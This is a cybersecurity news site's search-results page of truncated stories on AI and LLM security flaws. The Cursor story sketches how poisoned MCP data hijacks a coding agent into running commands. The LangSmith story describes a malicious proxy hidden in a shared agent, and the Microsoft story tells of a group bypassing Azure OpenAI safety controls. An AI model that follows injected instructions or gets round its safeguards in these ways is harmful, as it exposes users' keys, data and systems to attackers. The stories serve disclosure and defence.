#1 Trusted Cybersecurity News Platform
Followed by 5.20+ million
The Hacker News Logo
Subscribe – Get Latest News
Salesforce Security Handbook

Search results for api keys openai api | Breaking Cybersecurity News | The Hacker News

LangSmith Bug Could Expose OpenAI Keys and User Data via Malicious Agents

LangSmith Bug Could Expose OpenAI Keys and User Data via Malicious Agents

Jun 17, 2025 Vulnerability / LLM Security
Cybersecurity researchers have disclosed a now-patched security flaw in LangChain's LangSmith platform that could be exploited to capture sensitive data, including API keys and user prompts. The vulnerability, which carries a CVSS score of 8.8 out of a maximum of 10.0, has been codenamed AgentSmith by Noma Security. LangSmith is an observability and evaluation platform that allows users to develop, test, and monitor large language model (LLM) applications, including those built using LangChain. The service also offers what's called a LangChain Hub , which acts as a repository for all publicly listed prompts, agents, and models. "This newly identified vulnerability exploited unsuspecting users who adopt an agent containing a pre-configured malicious proxy server uploaded to 'Prompt Hub,'" researchers Sasi Levi and Gal Moyal said in a report shared with The Hacker News. "Once adopted, the malicious proxy discreetly intercepted all user communicatio...
Microsoft Sues Hacking Group Exploiting Azure AI for Harmful Content Creation

Microsoft Sues Hacking Group Exploiting Azure AI for Harmful Content Creation

Jan 11, 2025 AI Security / Cybersecurity
Microsoft has revealed that it's pursuing legal action against a "foreign-based threat–actor group" for operating a hacking-as-a-service infrastructure to intentionally get around the safety controls of its generative artificial intelligence (AI) services and produce offensive and harmful content. The tech giant's Digital Crimes Unit (DCU) said it has observed the threat actors "develop sophisticated software that exploited exposed customer credentials scraped from public websites," and "sought to identify and unlawfully access accounts with certain generative AI services and purposely alter the capabilities of those services." The adversaries then used these services, such as Azure OpenAI Service, and monetized the access by selling them to other malicious actors, providing them with detailed instructions as to how to use these custom tools to generate harmful content. Microsoft said it discovered the activity in July 2024. The Windows maker...
Python's PyPI Reveals Its Secrets

Python's PyPI Reveals Its Secrets

Apr 11, 2024 Software Security / Programming
GitGuardian is famous for its annual  State of Secrets Sprawl  report. In their 2023 report, they found over 10 million exposed passwords, API keys, and other credentials exposed in public GitHub commits. The takeaways in their 2024 report did not just highlight 12.8 million  new  exposed secrets in GitHub, but a number in the popular Python package repository  PyPI . PyPI, short for the Python Package Index, hosts over 20 terabytes of files that are freely available for use in Python projects. If you've ever typed pip install [name of package], it likely pulled that package from PyPI. A lot of people use it too. Whether it's GitHub, PyPI, or others, the report states, "open-source packages make up an estimated 90% of the code run in production today. "  It's easy to see why that is when these packages help developers avoid the reinvention of millions of wheels every day. In the 2024 report, GitGuardian reported finding over 11,000 exposed  unique...
cyber security

The Breach You Didn't Expect: Your AppSec Stack

websiteJFrogAppSec / DevSecOps
In a market undergoing mergers and acquisitions, vendor instability can put you in serious risk.
cyber security

How AI and Zero Trust Work Together to Catch Attacks With No Files or Indicators

websiteTHN WebinarZero Trust / Cloud Security
Modern cyberattacks hide in trusted tools and workflows, evading traditional defenses. Zero Trust and AI-powered cloud security give you the visibility and control to stop these invisible threats early.
Meta's Llama Framework Flaw Exposes AI Systems to Remote Code Execution Risks

Meta's Llama Framework Flaw Exposes AI Systems to Remote Code Execution Risks

Jan 26, 2025 AI Security / Vulnerability
A high-severity security flaw has been disclosed in Meta's Llama large language model (LLM) framework that, if successfully exploited, could allow an attacker to execute arbitrary code on the llama-stack inference server.  The vulnerability, tracked as CVE-2024-50050 , has been assigned a CVSS score of 6.3 out of 10.0. Supply chain security firm Snyk, on the other hand, has assigned it a critical severity rating of 9.3. "Affected versions of meta-llama are vulnerable to deserialization of untrusted data, meaning that an attacker can execute arbitrary code by sending malicious data that is deserialized," Oligo Security researcher Avi Lumelsky said in an analysis earlier this week. The shortcoming, per the cloud security company, resides in a component called Llama Stack , which defines a set of API interfaces for artificial intelligence (AI) application development, including using Meta's own Llama models. Specifically, it has to do with a remote code execution ...
12,000+ API Keys and Passwords Found in Public Datasets Used for LLM Training

12,000+ API Keys and Passwords Found in Public Datasets Used for LLM Training

Feb 28, 2025 Machine Learning / Data Privacy
A dataset used to train large language models (LLMs) has been found to contain nearly 12,000 live secrets, which allow for successful authentication. The findings once again highlight how hard-coded credentials pose a severe security risk to users and organizations alike, not to mention compounding the problem when LLMs end up suggesting insecure coding practices to their users. Truffle Security said it downloaded a December 2024 archive from Common Crawl , which maintains a free, open repository of web crawl data. The massive dataset contains over 250 billion pages spanning 18 years.  The archive specifically contains 400TB of compressed web data, 90,000 WARC files (Web ARChive format), and data from 47.5 million hosts across 38.3 million registered domains. The company's analysis found that there are 219 different secret types in the Common Crawl archive, including Amazon Web Services (AWS) root keys, Slack webhooks, and Mailchimp API keys. "'Live' secrets ar...
ChatGPT Security: OpenAI's Bug Bounty Program Offers Up to $20,000 Prizes

ChatGPT Security: OpenAI's Bug Bounty Program Offers Up to $20,000 Prizes

Apr 13, 2023 Software Security / Bug Hunting
OpenAI, the company behind the massively popular ChatGPT AI chatbot, has launched a  bug bounty program  in an attempt to ensure its systems are "safe and secure." To that end, it has partnered with the crowdsourced security platform  Bugcrowd  for independent researchers to report vulnerabilities discovered in its product in exchange for rewards ranging from "$200 for low-severity findings to up to $20,000 for exceptional discoveries." It's worth noting that the program does not cover  model safety or hallucination issues , wherein the chatbot is prompted to generate malicious code or other faulty outputs. The company noted that "addressing these issues often involves substantial research and a broader approach." Other prohibited categories are denial-of-service (DoS) attacks, brute-forcing OpenAI APIs, and demonstrations that aim to destroy data or gain unauthorized access to sensitive information beyond what's necessary to highlight the prob...
Cursor AI Code Editor Fixed Flaw Allowing Attackers to Run Commands via Prompt Injection

Cursor AI Code Editor Fixed Flaw Allowing Attackers to Run Commands via Prompt Injection

Aug 01, 2025 Vulnerability / DevOps
Cybersecurity researchers have disclosed a now-patched, high-severity security flaw in Cursor, a popular artificial intelligence (AI) code editor, that could result in remote code execution (RCE). The vulnerability, tracked as CVE-2025-54135 (CVSS score: 8.6), has been addressed in version 1.3 released on July 29, 2025. It has been codenamed CurXecute by Aim Labs, which previously disclosed EchoLeak . "Cursor runs with developer‑level privileges, and when paired with an MCP server that fetches untrusted external data, that data can redirect the agent's control flow and exploit those privileges," the Aim Labs Team said in a report shared with The Hacker News. "By feeding poisoned data to the agent via MCP, an attacker can gain full remote code execution under the user privileges, and achieve any number of things, including opportunities for ransomware, data theft, AI manipulation and hallucinations, etc." In other words, the remote code execution can trigg...
⚡ Weekly Recap: Windows 0-Day, VPN Exploits, Weaponized AI, Hijacked Antivirus and More

⚡ Weekly Recap: Windows 0-Day, VPN Exploits, Weaponized AI, Hijacked Antivirus and More

Apr 14, 2025 Threat Intelligence / Cybersecurity
Attackers aren't waiting for patches anymore — they are breaking in before defenses are ready. Trusted security tools are being hijacked to deliver malware. Even after a breach is detected and patched, some attackers stay hidden. This week's events show a hard truth: it's not enough to react after an attack. You have to assume that any system you trust today could fail tomorrow. In a world where AI tools can be used against you and ransomware hits faster than ever, real protection means planning for things to go wrong — and still staying in control. Check out this week's update to find important threat news, helpful webinars, useful tools, and tips you can start using right away. ⚡ Threat of the Week Windows 0-Day Exploited for Ransomware Attacks — A security affecting the Windows Common Log File System (CLFS) was exploited as a zero-day in ransomware attacks aimed at a small number of targets, Microsoft revealed. The flaw, CVE-2025-29824, is a privilege escalation vulnerabilit...
Researchers Uncover Vulnerabilities in Open-Source AI and ML Models

Researchers Uncover Vulnerabilities in Open-Source AI and ML Models

Oct 29, 2024 AI Security / Vulnerability
A little over three dozen security vulnerabilities have been disclosed in various open-source artificial intelligence (AI) and machine learning (ML) models, some of which could lead to remote code execution and information theft. The flaws, identified in tools like ChuanhuChatGPT, Lunary, and LocalAI, have been reported as part of Protect AI's Huntr bug bounty platform. The most severe of the flaws are two shortcomings impacting Lunary, a production toolkit for large language models (LLMs) - CVE-2024-7474 (CVSS score: 9.1) - An Insecure Direct Object Reference (IDOR) vulnerability that could allow an authenticated user to view or delete external users, resulting in unauthorized data access and potential data loss CVE-2024-7475 (CVSS score: 9.1) - An improper access control vulnerability that allows an attacker to update the SAML configuration, thereby making it possible to log in as an unauthorized user and access sensitive information Also discovered in Lunary is anot...
⚡ Weekly Recap: Hot CVEs, npm Worm Returns, Firefox RCE, M365 Email Raid & More

⚡ Weekly Recap: Hot CVEs, npm Worm Returns, Firefox RCE, M365 Email Raid & More

Dec 01, 2025 Hacking News / Cybersecurity
Hackers aren't kicking down the door anymore. They just use the same tools we use every day — code packages, cloud accounts, email, chat, phones, and "trusted" partners — and turn them against us. One bad download can leak your keys. One weak vendor can expose many customers at once. One guest invite, one link on a phone, one bug in a common tool, and suddenly your mail, chats, repos, and servers are in play. Every story below is a reminder that your "safe" tools might be the real weak spot. ⚡ Threat of the Week Shai-Hulud Returns with More Aggression — The npm registry was targeted a second time by a self-replicating worm that went by the moniker "Sha1-Hulud: The Second Coming," affecting over 800 packages and 27,000 GitHub repositories. Like in the previous iteration, the main objective was to steal sensitive data like API keys, cloud credentials, and npm and GitHub authentication information, and facilitate deeper supply chain compromise in a worm-like fashion. Th...
Wiz Uncovers Critical Access Bypass Flaw in AI-Powered Vibe Coding Platform Base44

Wiz Uncovers Critical Access Bypass Flaw in AI-Powered Vibe Coding Platform Base44

Jul 29, 2025 LLM Security / Vulnerability
Cybersecurity researchers have disclosed a now-patched critical security flaw in a popular vibe coding platform called Base44 that could allow unauthorized access to private applications built by its users. "The vulnerability we discovered was remarkably simple to exploit -- by providing only a non-secret 'app_id' value to undocumented registration and email verification endpoints, an attacker could have created a verified account for private applications on their platform," cloud security firm Wiz said in a report shared with The Hacker News. A net result of this issue is that it bypasses all authentication controls, including Single Sign-On (SSO) protections, granting full access to all the private applications and data contained within them. Following responsible disclosure on July 9, 2025, an official fix was rolled out by Wix, which owns Base44, within 24 hours. There is no evidence that the issue was ever maliciously exploited in the wild. While vibe codin...
DeepSeek AI Database Exposed: Over 1 Million Log Lines, Secret Keys Leaked

DeepSeek AI Database Exposed: Over 1 Million Log Lines, Secret Keys Leaked

Jan 30, 2025 Artificial Intelligence / Data Privacy
Buzzy Chinese artificial intelligence (AI) startup DeepSeek , which has had a meteoric rise in popularity in recent days, left one of its databases exposed on the internet, which could have allowed malicious actors to gain access to sensitive data. The ClickHouse database "allows full control over database operations, including the ability to access internal data," Wiz security researcher Gal Nagli said . The exposure also includes more than a million lines of log streams containing chat history, secret keys, backend details, and other highly sensitive information, such as API Secrets and operational metadata. DeepSeek has since plugged the security hole following attempts by the cloud security firm to contact them. The database, hosted at oauth2callback.deepseek[.]com:9000 and dev.deepseek[.]com:9000, is said to have enabled unauthorized access to a wide range of information. The exposure, Wiz noted, allowed for complete database control and potential privilege escalati...
Malicious Nx Packages in ‘s1ngularity’ Attack Leaked 2,349 GitHub, Cloud, and AI Credentials

Malicious Nx Packages in 's1ngularity' Attack Leaked 2,349 GitHub, Cloud, and AI Credentials

Aug 28, 2025 AI Security / Cloud Security
The maintainers of the nx build system have alerted users to a supply chain attack that allowed attackers to publish malicious versions of the popular npm package and other auxiliary plugins with data-gathering capabilities. "Malicious versions of the nx package, as well as some supporting plugin packages, were published to npm, containing code that scans the file system, collects credentials, and posts them to GitHub as a repo under the user's accounts," the maintainers said in an advisory published Wednesday. Nx is an open-source, technology-agnostic build platform that's designed to manage codebases. It's advertised as an "AI-first build platform that connects everything from your editor to CI [continuous integration]." The npm package has over 3.5 million weekly downloads. The list of affected packages and versions is below. These versions have since been removed from the npm registry. The compromise of the nx package took place on August 26, 20...
From Misuse to Abuse: AI Risks and Attacks

From Misuse to Abuse: AI Risks and Attacks

Oct 16, 2024 Artificial Intelligence / Cybercrime
AI from the attacker's perspective: See how cybercriminals are leveraging AI and exploiting its vulnerabilities to compromise systems, users, and even other AI applications Cybercriminals and AI: The Reality vs. Hype "AI will not replace humans in the near future. But humans who know how to use AI are going to replace those humans who don't know how to use AI," says Etay Maor, Chief Security Strategist at Cato Networks and founding member of Cato CTRL . "Similarly, attackers are also turning to AI to augment their own capabilities." Yet, there is a lot more hype than reality around AI's role in cybercrime. Headlines often sensationalize AI threats, with terms like "Chaos-GPT" and "Black Hat AI Tools," even claiming they seek to destroy humanity. However, these articles are more fear-inducing than descriptive of serious threats. For instance, when explored in underground forums, several of these so-called "AI cyber tools" were found to be nothing...
Expert Insights Articles Videos
Cybersecurity Resources